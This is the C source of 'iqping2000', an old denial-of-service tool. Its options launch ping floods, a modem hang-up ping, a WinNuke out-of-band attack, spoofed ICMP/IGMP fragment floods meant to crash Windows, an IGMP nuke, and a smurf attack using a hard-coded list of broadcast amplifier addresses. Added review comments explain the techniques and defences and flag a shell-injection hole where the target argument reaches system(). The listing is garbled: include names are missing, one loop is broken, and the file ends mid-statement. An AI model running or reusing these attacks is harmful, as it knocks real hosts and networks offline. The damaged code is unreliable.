/*
   Legion2000 Security Research
   coded by iqlord

   This code was released when I was a member of the iQ Team 2000.

   iqping2000.c (v1.1.1.4) -> destination '/bin'
   massive multi attacker, coded for the SLACK people...Enjoy!

   --- a rebuild from the nasty iqping attacker v1.3 ---
   --- greets to author(s) of trash2.c|kod.c|smurf.c (respect) ---

   - You need 'su' privileges to execute some attack(s).

   compile: gcc iqping2000.c -DLINUX -o /bin/iqping2
            or try without the -DLINUX para...

   fixed slack8 problem with flood function...

   ey! Maximum greets to da Legion2000 and a funky spank to ntfx ;)

   [coded by iqlord]
   I don't teach...I learn !
*/

/*
 * NOTE(review): this listing has visibly lost text (apparently everything
 * that sat between '<' and '>' in the original): the #include lines below
 * carry no header names and a loop header inside sendwin98bug() is
 * incomplete. The code is therefore kept token-for-token as found; only
 * line breaks, indentation and comments were added.
 *
 * What the file is: a command-line dispatcher ("<prog> <host> -<option>")
 * over several late-1990s denial-of-service techniques named in its own
 * usage text, plus a hostname lookup. Every action is appended to LOGFILE.
 */

/* Header names missing in this copy; left as found. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Relative path, opened in append mode by logfile(); it is created in the
   operator's current working directory and is a useful host artifact
   (target, option used, local timestamp per run). */
#define LOGFILE "iqping.logfile"
/* Installs abort_inkeys() as the SIGINT handler. */
#define USEREXIT signal(SIGINT,abort_inkeys)
/* 139: TCP port connected to by oob(); also stored in sin_port by nuke(). */
#define WDPORT 139
/* Sizes of the static command-line buffers in modem() and flood(). */
#define LARGE1 150
#define LARGE2 200

/* ANSI colour escape sequences used in console output, and the packet count
   for dos() kept as a decimal string (dos() parses it with atoi). */
static unsigned const char *lred="\x1b[1;31m",
                           *lgreen="\x1b[1;32m",
                           *dgreen="\x1b[0;32m",
                           *lwhite="\x1b[1;37m",
                           *dwhite="\x1b[0;37m",
                           *dos_packets="1500";

/* Packet counts for smurf() and nuke(); nuke() decrements nuke_packets
   in place while sending. */
unsigned int smurf_packets=2000, // unlimited=0
             nuke_packets=100;

/* Forward declarations. in_cksum() has no prototype here (it is defined in
   old-style form before its first use); complete() is declared but its
   definition is not within this part of the listing. */
void abort_inkeys(int);
void ip_resolve(const char *);
void syntax(const char *);
void error(int);
void flood(const char *);
void modem(const char *);
void oob(unsigned char *);
int dos(const char *,const char *);
void nuke(const char *);
void logfile(const char *,const char *);
unsigned int randip(void);
int resolve(const char *,unsigned int,struct sockaddr_in *);
int sendwin98bug(struct sockaddr_in *,unsigned long);
int send_winbomb(int,unsigned long,struct sockaddr_in *);
int send_igmp(int,unsigned long,struct sockaddr_in *);
unsigned short in_chksum(u_short *,int);
void smurfsetup(int,struct sockaddr_in sin,u_long dest,int);
void smurf(const char *);
int complete(const char *,int);

/*
 * Entry point: argv[1] is the host, argv[2] selects the action.
 *
 * The outer test (argc<=3 || argc>=4) is true for every argc, so it filters
 * nothing; the real selection is the chain inside: argc==1 prints usage,
 * argc==2 reports missing parameters, argc==3 dispatches on argv[2], and
 * anything else (unknown option, or argc>=4) ends in error(3).
 */
int main(int argc,char **argv)
{
    if(argc<=3 || argc>=4)
    {
        if(argc==1) syntax(argv[0]);
        else if(argc==2) error(2);
        else if((argc==3)&&(strcmp(argv[2],"-flood")==0)) flood(argv[1]);
        else if((argc==3)&&(strcmp(argv[2],"-modem")==0)) modem(argv[1]);
        else if((argc==3)&&(strcmp(argv[2],"-oob")==0)) oob(argv[1]);
        else if((argc==3)&&(strcmp(argv[2],"-dos")==0)) dos(argv[1], dos_packets);
        else if((argc==3)&&(strcmp(argv[2],"-nuke")==0)) nuke(argv[1]);
        else if((argc==3)&&(strcmp(argv[2],"-smurf")==0)) smurf(argv[1]);
        else if((argc==3)&&(strcmp(argv[2],"-ip")==0)) ip_resolve(argv[1]);
        else error(3);
    }
    return(0);
}

/*
 * Prints the coloured usage text for program name `software` and exits
 * with status 1. The format string has 21 %s conversions matched by the
 * 21 colour/name arguments that follow it.
 */
void syntax(const char *software)
{
    printf(
        "%ssyntax: %s%s%s <-option>\n"
        " <%soptions%s>\n"
        " %s-flood%s \tmassive icmp hex pattern flood\n"
        " %s-modem%s \tdisconnects some modems (+++ATH0)\n"
        " %s-oob%s \tsends oob attack (Win95 bluescreen)\n"
        " %s-dos%s \tsends random spoofed icmp/igmp (Win9x/NT crash)\n"
        " %s-nuke%s \tsends igmp nuke (Win98 bluescreen)\n"
        " %s-smurf%s \tsends spoofed icmp packets from various brodcasts\n"
        " %s-ip%s \tresolves a hostnames ip\n"
        "%s"
        ,dgreen,lgreen,software,dgreen,lwhite,dgreen,lgreen,dgreen,lgreen
        ,dgreen,lgreen,dgreen,lgreen,dgreen,lgreen,dgreen,lgreen,dgreen
        ,lgreen,dgreen,dwhite);
    exit(1);
}

/*
 * SIGINT handler installed through USEREXIT. `ghost` (the signal number) is
 * unused. error(9) prints the "aborted by user" message and itself calls
 * exit(1), so the exit(1) below is not reached. Note that fprintf/exit are
 * not async-signal-safe.
 */
void abort_inkeys(int ghost)
{
    error(9);
    exit(1);
}

/*
 * Resolves `host` with gethostbyname(), logs the lookup and prints the
 * first address. A failed lookup ends the process inside error(6), so the
 * memcpy below never sees a NULL entry.
 */
void ip_resolve(const char *host)
{
    struct sockaddr_in sin;
    struct hostent *pHostentry;

    printf("%sip%s resolve loaded...\n",lwhite,dgreen);
    logfile(host,"ip");
    if((pHostentry=gethostbyname(host))==NULL) error(6);
    memcpy(&sin.sin_addr.s_addr,pHostentry->h_addr,pHostentry->h_length);
    /* NOTE(review): inet_ntoa() is given the s_addr member rather than the
       struct in_addr it is normally declared to take - confirm against the
       missing headers. */
    printf("%s%s%s ip -> %s%s\n"
           ,lgreen,host,dgreen,lgreen,
           inet_ntoa(sin.sin_addr.s_addr));
    complete("done.",0);
}

/*
 * Prints the message for error code `argc` (the parameter is a code, not an
 * argument count) to stderr and exits with status 1. Code 1 is the only one
 * that returns to the caller; unknown codes print a generic message.
 */
void error(const int argc)
{
    if(argc==1) return;
    else if(argc==2) fprintf(stderr,"%sinsufficient parameters!%s\n",lred,dwhite);
    else if(argc==3) fprintf(stderr,"%sunable to locate that function!%s\n",lred,dwhite);
    else if(argc==4) fprintf(stderr,"%sunable to create logfile!%s\n",lred,dwhite);
    else if(argc==5) fprintf(stderr,"%sunable to send!%s\n",lred,dwhite);
    else if(argc==6) fprintf(stderr,"%sunable to resolve host!%s\n",lred,dwhite);
    else if(argc==7) fprintf(stderr,"%sunable to open raw socket!%s\n",lred,dwhite);
    else if(argc==8) fprintf(stderr,"%sunable to connect to host!%s\n",lred,dwhite);
    else if(argc==9) fprintf(stderr,"%s\nattack aborted by user!%s\n",lred,dwhite);
    else fprintf(stderr,"%serror!%s\n",lred,dwhite);
    exit(1);
}

/*
 * "-flood": appends `victim` to a fixed /bin/ping flood command line and
 * runs it through system().
 *
 * Review notes: `victim` is argv[1] and reaches the shell unmodified, so
 * shell metacharacters in it are interpreted by the shell; and the strncat
 * bound is strlen(victim), i.e. the source length, not the space left in
 * the LARGE2-byte static buffer, so a long argument writes past flood_p.
 * On the sending host this appears as a child /bin/ping process with -f;
 * on the receiving side it is an ordinary high-rate ICMP echo stream, for
 * which ICMP rate limiting is the usual control.
 */
void flood(const char *victim)
{
    unsigned static char flood_p[LARGE2]="/bin/ping -f -s 65400 -p 102b2b2b2b2b2070d ";

    printf("%sflood%s attack loaded...\n",lwhite,dgreen);
    logfile(victim,"flood");
    strncat(flood_p,victim,strlen(victim));
    system(flood_p);
    complete("done.",0);
}

/*
 * "-modem": same construction as flood(), with a 9-packet ping whose fill
 * pattern 2b2b2b415448300d is the ASCII bytes "+++ATH0" followed by CR,
 * the modem hang-up sequence named in the usage text.
 *
 * The same two review notes as for flood() apply (unsanitised argument
 * passed to system(), strncat bounded by the source length against the
 * LARGE1-byte buffer). The effect depends on a modem acting on the escape
 * sequence when it appears inside the data stream; modems that require a
 * guard time around "+++", or have the in-band escape disabled, ignore it.
 */
void modem(const char *victim)
{
    unsigned static char modem_p[LARGE1]="/bin/ping -c 9 -s 1234 -p 2b2b2b415448300d ";

    printf("%smodem%s attack loaded...\n",lwhite,dgreen);
    logfile(victim,"modem");
    strncat(modem_p,victim,strlen(victim));
    system(modem_p);
    complete("done.",0);
}

/*
 * "-oob": opens a TCP connection to port WDPORT (139) on `victim` and sends
 * the string in _dmsg with MSG_OOB, i.e. as TCP urgent data. The usage text
 * ties this to a Windows 95 crash; the technique is commonly known as
 * WinNuke. On the wire it is a TCP segment with the URG flag set to
 * port 139, and filtering NetBIOS ports from untrusted networks blocks it.
 *
 * open_sock() is a nested function, which is a GNU C extension. Its return
 * value is ignored by the caller; its failure paths call error(), which
 * exits. Locals x, addr, spoofedaddr and host are never used.
 */
void oob(unsigned char *victim)
{
    static char *_dmsg="0x0000001";
    int s,x;

    /* Fills in the destination (resolver first, dotted quad as fallback)
       and connects `sock` to it. The address length passed to connect() is
       the literal 16. */
    int open_sock(int sock,char *ip,int prt)
    {
        struct sockaddr_in addr,spoofedaddr;
        struct sockaddr_in iqpw;
        struct hostent *host;
        struct hostent *ghbn;

        bzero((char *)&iqpw,sizeof(iqpw));
        iqpw.sin_family=AF_INET;
        iqpw.sin_addr.s_addr=inet_addr(ip);
        iqpw.sin_port=htons(prt);
        printf("%soob%s attack loaded...\n",lwhite,dgreen);
        logfile(victim,"oob");
        USEREXIT;
        if((ghbn=gethostbyname(ip))!=NULL)
            bcopy(ghbn->h_addr,(char *)&iqpw.sin_addr,ghbn->h_length);
        /* NOTE(review): if s_addr is an unsigned type, as is usual, this
           "<0" test can never be true - confirm against the headers. */
        else if((iqpw.sin_addr.s_addr=inet_addr(ip))<0)
        {
            error(6);
            return(-3);
        }
        if(connect(sock,(struct sockaddr *)&iqpw,16)==-1)
        {
            error(8);
            close(sock);
            return(-4);
        }
        return(0);
    }

    if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
    {
        error(7);
        exit(-1);
    }
    open_sock(s,victim,WDPORT);
    printf("sending %s",_dmsg);
    send(s,_dmsg,strlen(_dmsg),MSG_OOB);
    usleep(100000);
    close(s);
    complete("done.",1);
}

/*
 * Appends one line to LOGFILE recording `victim`, the option name `attack`
 * and the local time. The "ip" action is logged as "resolved", everything
 * else as "attacked". asctime() output already ends in a newline, which is
 * why the format strings have none. A failed fopen() ends the process via
 * error(4).
 */
void logfile(const char *victim,const char *attack)
{
    static char *show_t;
    FILE *file_p;
    time_t now;

    time(&now);
    show_t=asctime(localtime(&now));
    if((file_p=fopen(LOGFILE,"a"))==NULL) error(4);
    if((strcmp(attack,"ip")==0))
        fprintf(file_p,"resolved: %s using [%s] resolve. Date: %s"
                ,victim,attack,show_t);
    else
        fprintf(file_p,"attacked: %s using [%s] attack. Date: %s"
                ,victim,attack,show_t);
    fclose(file_p);
}

/*
 * Formats a random dotted quad (first octet 23..213, the others 1..253),
 * hands it to inet_aton() and returns sin.sin_addr.s_addr of a local
 * sockaddr_in. Used by dos() as the source address of each packet.
 *
 * The 16-byte buffer from calloc() is never freed, so every call leaks it;
 * the calloc() result is not checked. `he` is unused.
 */
unsigned int randip(void)
{
    struct hostent *he;
    struct sockaddr_in sin;
    char *buf=(char *)calloc(1,sizeof(char)*16);

    sprintf(buf,"%d.%d.%d.%d",
            (random()%191)+23,
            (random()%253)+1,
            (random()%253)+1,
            (random()%253)+1);
    inet_aton(buf,(struct in_addr *)&sin);
    return(sin.sin_addr.s_addr);
}

/*
 * Fills *addr for `name` and `port`: tries `name` as a dotted quad first
 * and falls back to gethostbyname() when inet_addr() returns -1.
 *
 * Always returns 0; an unresolvable name ends the process inside error(6).
 * Callers that test the result against -1 therefore never take that branch.
 */
int resolve(const char *name,unsigned int port,struct sockaddr_in *addr)
{
    struct hostent *host;

    memset(addr,0,sizeof(struct sockaddr_in));
    addr->sin_family=AF_INET;
    addr->sin_addr.s_addr=inet_addr(name);
    if(addr->sin_addr.s_addr==-1)
    {
        if((host=gethostbyname(name))==NULL) error(6);
        addr->sin_family=host->h_addrtype;
        memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
    }
    addr->sin_port=htons(port);
    return(0);
}

/*
 * 16-bit one's-complement checksum over `len` bytes starting at `addr`,
 * written as an old-style (K&R) definition. Sums 16-bit words, adds a
 * trailing odd byte, folds the carries back into the low 16 bits and
 * returns the complement. Used for the IP, ICMP and IGMP header checksums
 * in sendwin98bug(), send_winbomb() and send_igmp().
 */
unsigned short in_cksum(addr,len)
u_short *addr;
int len;
{
    register int nleft=len;
    register u_short *w=addr;
    register int sum=0;
    u_short answer=0;

    while(nleft>1)
    {
        sum+=*w++;
        nleft-=2;
    }
    if(nleft==1)
    {
        *(u_char *)(&answer)=*(u_char *)w;
        sum+=answer;
    }
    sum=(sum>>16)+(sum & 0xffff);
    sum+=(sum>>16);
    answer=~sum;
    return(answer);
}

/*
 * Builds a BIGIGMP-byte (1500) buffer holding an IP header (protocol IGMP,
 * more-fragments bit set, source `spoof`, destination taken from `victim`)
 * followed by an IGMP header, then sends it with varying fragment offsets.
 * The usage text associates the IGMP options with Windows 98 crashes.
 * Dropping IGMP and fragments arriving from untrusted networks at the edge
 * is the usual control.
 *
 * NOTE(review): part of this function is missing from the listing. The
 * for-header below breaks off after "i", the body that followed it and the
 * start of the send loop are gone, and no statement that opens the socket
 * `s` survives even though `s` is used by sendto() and close(). The
 * remaining tokens are reproduced exactly as found and do not form valid C.
 * `un` and `p` are unused in the visible part.
 */
int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof)
{
    int BIGIGMP = 1500;
    unsigned char *pkt;
    struct iphdr *ip;
    struct igmphdr *igmp;
    struct utsname *un;
    struct passwd *p;
    int i,s,id=(random()%40000)+500;

    pkt=(unsigned char *)calloc(1,BIGIGMP);
    ip=(struct iphdr *)pkt;
    igmp=(struct igmphdr *)(pkt+sizeof(struct iphdr));
    ip->version=4;
    ip->ihl=(sizeof *ip)/4;
    ip->ttl=255;
    ip->tot_len=htons(BIGIGMP);
    ip->protocol=IPPROTO_IGMP;
    ip->id=htons(id);
    ip->frag_off=htons(IP_MF);
    ip->saddr=spoof;
    ip->daddr=victim->sin_addr.s_addr;
    ip->check=in_cksum((unsigned short *)ip,sizeof(struct iphdr));
    igmp->type=0;
    igmp->group=0;
    igmp->csum=in_cksum((unsigned short *)igmp,sizeof(struct igmphdr));
    /* Text lost here in extraction; see the note above the function. */
    for(i=sizeof(struct iphdr)+sizeof(struct igmphdr)+1; i3)
        ip->frag_off=htons(((BIGIGMP-20)*i)>>3);
    else
        ip->frag_off=htons(((BIGIGMP-20)*i)>>3 | IP_MF);
    sendto(s,pkt,BIGIGMP,0,victim,sizeof(struct sockaddr_in));
    }
    free(pkt);
    close(s);
    return(0);
}

/*
 * Sends two IP fragments carrying an ICMP header with random type and code
 * (rand()%15 each) from source `spoof_addr` to `dest_addr` over the raw
 * socket `socket`. Both fragments have the more-fragments bit (0x2000) set;
 * the second one has fragment offset 8>>3 and a zero ICMP checksum.
 *
 * Returns 0 on success, -1 if either sendto() fails. On the -1 paths
 * `packet` is not freed. The malloc() result is not checked; `rc` is unused.
 */
int send_winbomb(int socket,
                 unsigned long spoof_addr,
                 struct sockaddr_in *dest_addr)
{
    unsigned char *packet;
    struct iphdr *ip;
    struct icmphdr *icmp;
    int rc;

    packet=(unsigned char *)malloc(sizeof(struct iphdr)+
                                   sizeof(struct icmphdr)+8);
    ip=(struct iphdr *)packet;
    icmp=(struct icmphdr *)(packet+sizeof(struct iphdr));
    memset(ip,0,sizeof(struct iphdr)+sizeof(struct icmphdr)+8);

    /* First fragment: header fields set, tot_len still zero from memset. */
    ip->ihl=5;
    ip->version=4;
    ip->id=htons(1234);
    ip->frag_off |= htons(0x2000);
    ip->ttl=30;
    ip->protocol=IPPROTO_ICMP;
    ip->saddr=spoof_addr;
    ip->daddr=dest_addr->sin_addr.s_addr;
    ip->check=in_cksum(ip, sizeof(struct iphdr));
    icmp->type=rand()%15;
    icmp->code=rand()%15;
    icmp->checksum=in_cksum(icmp,sizeof(struct icmphdr)+1);
    if(sendto(socket,
              packet,
              sizeof(struct iphdr)+
              sizeof(struct icmphdr)+1,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr))==-1)
    {
        return(-1);
    }

    /* Second fragment: same buffer, offset 8>>3, new random type/code. */
    ip->tot_len=htons(sizeof(struct iphdr)+sizeof(struct icmphdr)+8);
    ip->frag_off=htons(8>>3);
    ip->frag_off |=htons(0x2000);
    ip->check=in_cksum(ip,sizeof(struct iphdr));
    icmp->type=rand()%15;
    icmp->code=rand()%15;
    icmp->checksum=0;
    if(sendto(socket,
              packet,
              sizeof(struct iphdr)+
              sizeof(struct icmphdr)+8,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr))==-1)
    {
        return(-1);
    }
    free(packet);
    return(0);
}

/*
 * IGMP counterpart of send_winbomb(): three sendto() calls on the same
 * buffer with source `spoof_addr`, all with the more-fragments bit (0x2000)
 * set. The first two use IGMP type 8 and a length of header+1 bytes; the
 * third uses type 0 and header+8 bytes.
 *
 * Returns 0 on success, -1 if any sendto() fails. On the -1 paths `packet`
 * is not freed. The malloc() result is not checked; `rc` is unused.
 */
int send_igmp(int socket,
              unsigned long spoof_addr,
              struct sockaddr_in *dest_addr)
{
    unsigned char *packet;
    struct iphdr *ip;
    struct igmphdr *igmp;
    int rc;

    packet=(unsigned char *)malloc(sizeof(struct iphdr)+
                                   sizeof(struct igmphdr)+8);
    ip=(struct iphdr *)packet;
    igmp=(struct igmphdr *)(packet+sizeof(struct iphdr));
    memset(ip,0,sizeof(struct iphdr)+sizeof(struct igmphdr)+8);

    ip->ihl=5;
    ip->version= 4;
    ip->id=htons(34717);
    ip->frag_off=htons(0x2000);
    ip->ttl=255;
    ip->protocol=IPPROTO_IGMP;
    ip->saddr=spoof_addr;
    ip->daddr=dest_addr->sin_addr.s_addr;
    ip->check=in_cksum(ip, sizeof(struct iphdr));
    igmp->type=8;
    igmp->code=0;
    if(sendto(socket,
              packet,
              sizeof(struct iphdr)+
              sizeof(struct igmphdr)+1,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr))==-1)
    {
        return(-1);
    }

    ip->tot_len=htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
    ip->frag_off=htons(8 >> 3);
    ip->version=4;
    ip->id=htons(34717);
    ip->frag_off |=htons(0x2000);
    ip->ttl=255;
    ip->protocol=IPPROTO_IGMP;
    ip->saddr=spoof_addr;
    ip->daddr=dest_addr->sin_addr.s_addr;
    ip->check=in_cksum(ip, sizeof(struct iphdr));
    igmp->type=8;
    igmp->code=0;
    if(sendto(socket,
              packet,
              sizeof(struct iphdr)+
              sizeof(struct igmphdr)+1,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr))==-1)
    {
        return(-1);
    }

    ip->tot_len=htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
    ip->frag_off=htons(8 >> 3);
    ip->frag_off |=htons(0x2000);
    ip->check=in_cksum(ip, sizeof(struct iphdr));
    igmp->type=0;
    igmp->code=0;
    if(sendto(socket,
              packet,
              sizeof(struct iphdr)+
              sizeof(struct igmphdr)+8,0,
              (struct sockaddr *)dest_addr,
              sizeof(struct sockaddr))==-1)
    {
        return(-1);
    }
    free(packet);
    return(0);}

/*
 * "-dos": opens a raw socket, resolves `victim`, then loops calling
 * send_winbomb(), send_igmp() and sendwin98bug(), each with a fresh
 * randip() value as source address, sleeping 10 ms per round.
 *
 * Because the source changes with every packet, blocking by source address
 * does not help the receiver; filtering on protocol and fragment
 * characteristics does, and ingress filtering (BCP 38) on the sender's
 * network keeps such spoofed packets from leaving it.
 *
 * Review notes: `sock` is unsigned, so the "<0" test on socket() cannot be
 * true; src_addr is read from dest_addr before resolve() has filled it and
 * is never used afterwards; atoi(pkts) is re-evaluated on every iteration
 * and the "<=" makes the loop run once more than the count; the function
 * is declared int but has no return statement after complete().
 */
int dos(const char *victim,const char *pkts)
{
    struct sockaddr_in dest_addr;
    unsigned int i,sock;
    unsigned long src_addr;

    printf("%sdos%s attack loaded...\n",lwhite,dgreen);
    logfile(victim,"dos");
    USEREXIT;
    if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) error(7);
    src_addr=dest_addr.sin_addr.s_addr;
    if(resolve(victim,0,&dest_addr)==-1)
    {
        return(-1);
    }
    printf("sending %s packages to %s\n",pkts,victim);
    for(i=0;i<=atoi(pkts);i++)
    {
        fprintf(stderr,".");//debug->("%d ",i)
        if(send_winbomb(sock,randip(),&dest_addr)==-1 ||
           send_igmp(sock, randip(),&dest_addr)==-1 ||
           sendwin98bug(&dest_addr,randip()))
            error(8);
        usleep(10000);
    }
    complete("done.",1);
}

/*
 * "-nuke": opens a raw socket for IP protocol number 2 (IGMP), connects it
 * to `victim` and sends nuke_packets datagrams of maxpkt bytes each, about
 * 40 ms apart. maxpkt is computed once as nuke_packets+5 before the
 * counter is decremented. Unlike dos(), the source address is not spoofed
 * here, so the sender's real address is in every packet.
 *
 * Review note: buf is never initialised, so the bytes sent are whatever
 * happens to be on the stack.
 */
void nuke(const char *victim)
{
    struct sockaddr_in sin;
    struct hostent *host;
    size_t maxpkt=nuke_packets+5;
    char buf[15000];
    int sd;

    printf("%snuke%s attack loaded...\n",lwhite,dgreen);
    logfile(victim,"nuke");
    USEREXIT;
    if((host=gethostbyname(victim))==NULL)
    {
        error(6);
        exit(1);
    }
    memcpy(&sin.sin_addr.s_addr,host->h_addr,host->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(WDPORT);
    if((sd=socket(AF_INET,SOCK_RAW,2))==-1)
    {
        error(7);
        exit(1);
    }
    if(-1==connect(sd,(struct sockaddr *)&sin,sizeof(sin)))
    {
        error(8);
        close(sd);
        exit(1);
    }
    printf("sending %d packages to %s\n",nuke_packets,victim);
    while(nuke_packets--)
    {
        usleep(40001);
        if(send(sd,buf,maxpkt,0)==-1)
        {
            error(5);
            close(sd);
            exit(1);
        }
        fprintf(stderr,".");
    }
    usleep(10001);
    close(sd);
    complete("done.",1);
}

/*
 * Second checksum routine, called only by smurfsetup(). Sums `len` bytes
 * at `addr` as 16-bit words, adds a trailing odd byte, applies the two
 * adjustment lines below and returns the complement of the result.
 */
unsigned short in_chksum(u_short *addr,int len)
{
    register int nleft=len;
    register int sum=0;
    u_short answer=0;

    while(nleft>1)
    {
        sum+=*addr++;
        nleft-=2;
    }
    if(nleft==1)
    {
        *(u_char *)(&answer)=*(u_char *)addr;
        sum+=answer;
    }
    sum=(sum>>16)+(sum+0xffff);
    sum+=(sum>>16);
    answer=~sum;
    return(answer);
}

/*
 * Builds one ICMP echo request (type 8, code 0) with `psize` bytes of zero
 * payload, IP source taken from `sin` and IP destination `dest`, and sends
 * it on the raw socket `sock`; the sockaddr passed to sendto() is `sin`.
 * The malloc() result is not checked.
 *
 * This is the packet shape of a "smurf" (echo requests with a spoofed
 * source sent to broadcast addresses, per the usage text). Networks avoid
 * being used as amplifiers by not forwarding directed broadcasts, and
 * ingress filtering (BCP 38) stops the spoofed source at the origin.
 */
void smurfsetup(int sock,struct sockaddr_in sin,u_long dest,int psize)
{
    struct iphdr *ip;
    struct icmphdr *icmp;
    char *packet;

    packet=malloc(sizeof(struct iphdr)+sizeof(struct icmphdr)+psize);
    ip=(struct iphdr *)packet;
    icmp=(struct icmphdr *) (packet+sizeof(struct iphdr));
    memset(packet, 0, sizeof(struct iphdr)+sizeof(struct icmphdr)+psize);
    ip->tot_len=htons(sizeof(struct iphdr)+sizeof(struct icmphdr)+psize);
    ip->ihl=5;
    ip->version=4;
    ip->ttl=255;
    ip->tos=0;
    ip->frag_off=0;
    ip->protocol=IPPROTO_ICMP;
    ip->saddr=sin.sin_addr.s_addr;
    ip->daddr=dest;
    ip->check=in_chksum((u_short *)ip,sizeof(struct iphdr));
    icmp->type=8;
    icmp->code=0;
    icmp->checksum=in_chksum((u_short *)icmp,sizeof(struct icmphdr)+psize);
    sendto(sock,packet,sizeof(struct iphdr)+sizeof(struct icmphdr)+psize,
           0,(struct sockaddr *)&sin,sizeof(struct sockaddr));
    free(packet);
}

void smurf(const char *victim)
{
    struct sockaddr_in sin;
    struct hostent *he;
    int i,sock,delay,sizebcast,pktsize,bcast=1,cycle=10;
    char *bcastaddr[]={
        "199.171.190.0",
        "165.154.1.255",
        "205.139.4.255",
        "198.3.101.255",
        "204.71.177.0",
        "192.41.177.255",
        "206.13.28.255",
"144.228.20.255", "206.137.184.255", "198.32.186.255", "130.63.236.255", "208.202.14.255", "208.131.162.255", "199.171.6.255", "207.124.104.255", "205.180.58.255", "198.3.98.0", "131.104.96.255", "143.43.32.0", "131.215.48.0", "204.117.214.0", "130.235.20.255", "206.79.254.255", "199.222.42.255", "204.71.242.255", "204.162.80.0", "128.194.103.255", "207.221.53.255", "207.126.113.255", "198.53.145.255", "209.25.21.255", "194.51.83.255", "207.51.48.255", "129.130.12.255", "192.231.221.255", "168.17.197.255", "198.242.55.255", "130.160.224.255", "128.83.40.255", "131.215.48.255", "169.130.10.255", "207.20.7.255", "163.179.1.0", "129.16.1.0", "128.122.27.255", "132.236.230.255", "198.32.146.255", "192.41.177.0", NULL }; printf("%ssmurf%s attack loaded...\n",lwhite,dgreen); logfile(victim,"smurf"); USEREXIT; if((he=gethostbyname(victim))==NULL) { error(6); exit(-1); } memcpy((caddr_t)&sin.sin_addr,he->h_addr,he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(0); sizebcast=0; delay=10000; pktsize=64; if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) { error(7); exit(-1); } setsockopt(sock,SOL_SOCKET,SO_BROADCAST,(char *)&bcast,sizeof(bcast)); if(smurf_packets==0) printf("sending unlimited packages to %s\n",victim); else printf("sending %d packages to %s\n",smurf_packets,victim); for(i=0;i